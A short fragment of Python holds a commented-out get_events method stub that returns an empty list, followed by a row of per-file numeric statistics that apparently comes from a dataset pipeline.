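#     def get_events(self, context, filters=None, fields=None, sorts=None,
#                    limit=None, marker_obj=None, page_reverse=False):
#         return []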
| 28.841772 | 78 | 0.65745 | 501 | 4,557 | 5.798403 | 0.369261 | 0.02685 | 0.033735 | 0.045783 | 0.185198 | 0.17074 | 0.143201 | 0.11222 | 0.11222 | 0.098451 | 0 | 0.008816 | 0.253237 | 4,557 | 157 | 79 | 29.025478 | 0.844843 | 0.136054 | 0 | 0.311927 | 0 | 0 | 0.18052 | 0.006374 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12844 | false | 0.027523 | 0.073395 | 0.082569 | 0.431193 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |